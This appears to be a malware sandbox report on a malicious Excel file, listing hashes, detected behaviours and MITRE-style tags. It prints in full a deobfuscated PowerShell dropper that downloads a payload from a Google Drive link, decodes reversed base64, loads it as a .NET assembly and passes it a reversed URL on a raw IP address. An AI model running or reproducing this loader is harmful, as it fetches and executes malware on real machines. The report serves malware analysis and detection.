General

  • Target

    8cd8de65f269a3096ab4090427fcb0d5f5ae99229f29465bc2bdb2c2ba304635.xlsx

  • Size

    645KB

  • Sample

    241107-c9yg9sspgs

  • MD5

    0f35365b3df2274c5f34bd63be285912

  • SHA1

    52571d67c3f6bb3db33dfb79bf157b181c6e9b6a

  • SHA256

    8cd8de65f269a3096ab4090427fcb0d5f5ae99229f29465bc2bdb2c2ba304635

  • SHA512

    e68276ad9a3cf89f3ce721dce123515efce9a22061ecde74d6662689c34229575dcfa72ff9a606a9148d07877f6b4b74397500d26bf206b56554df0377ba3dac

  • SSDEEP

    12288:ebWNHd0zBVnumU9j/rVDWHlYG7GKanCl3qnklaYr+Uf:Ksd2u3FDWHlpVKXYr3

Malware Config

Extracted

Language
ps1
Deobfuscated
1
# powershell snippet 0
2
invoke-expression "$imageUrl = 'https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 ';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$base64Reversed = -join ($base64Command.ToCharArray() | ForEach-Object { $_ })[-1..-($base64Command.Length)];$commandBytes = [System.Convert]::FromBase64String($base64Reversed);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$vaiMethod = [dnlib.IO.Home].GetMethod('VAI');$vaiMethod.Invoke($null, @('txt.GFSSWZ/211/031.16.271.701//:ptth', 'desativado', 'desativado', 'desativado', 'aspnet_regbrowsers', 'desativado', 'desativado','desativado','desativado','desativado','desativado','desativado','1','desativado'));"
3
4
# powershell snippet 1
5
$imageurl = "https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 "
6
$webclient = new-object system.net.webclient
7
$imagebytes = $webclient.downloaddata("https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 ")
8
$imagetext = ([system.text.encoding]::ascii).getstring($imagebytes)
9
$startflag = "<<BASE64_START>>"
10
$endflag = "<<BASE64_END>>"
11
$startindex = $imagetext.indexof("<<BASE64_START>>")
12
$endindex = $imagetext.indexof("<<BASE64_END>>")
13
$startindex -ge 0 -and $endindex -gt $startindex
14
$startindex = $startflag.length
15
$base64length = $endindex - $startindex
16
$base64command = $imagetext.substring($startindex, $base64length)
17
$base64reversed = -join $base64command.tochararray()|%{$_}[-(1..)($base64command.length)]
18
$commandbytes = [system.convert]::frombase64string($base64reversed)
19
$loadedassembly = [system.reflection.assembly]::load($commandbytes)
20
$vaimethod = ([dnlib.io.home]).getmethod("VAI")
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

exe.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

Targets

    • Target

      8cd8de65f269a3096ab4090427fcb0d5f5ae99229f29465bc2bdb2c2ba304635.xlsx

    • Size

      645KB

    • MD5

      0f35365b3df2274c5f34bd63be285912

    • SHA1

      52571d67c3f6bb3db33dfb79bf157b181c6e9b6a

    • SHA256

      8cd8de65f269a3096ab4090427fcb0d5f5ae99229f29465bc2bdb2c2ba304635

    • SHA512

      e68276ad9a3cf89f3ce721dce123515efce9a22061ecde74d6662689c34229575dcfa72ff9a606a9148d07877f6b4b74397500d26bf206b56554df0377ba3dac

    • SSDEEP

      12288:ebWNHd0zBVnumU9j/rVDWHlYG7GKanCl3qnklaYr+Uf:Ksd2u3FDWHlpVKXYr3

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

    • Evasion via Device Credential Deployment

    • Legitimate hosting services abused for malware hosting/C2

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v15

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.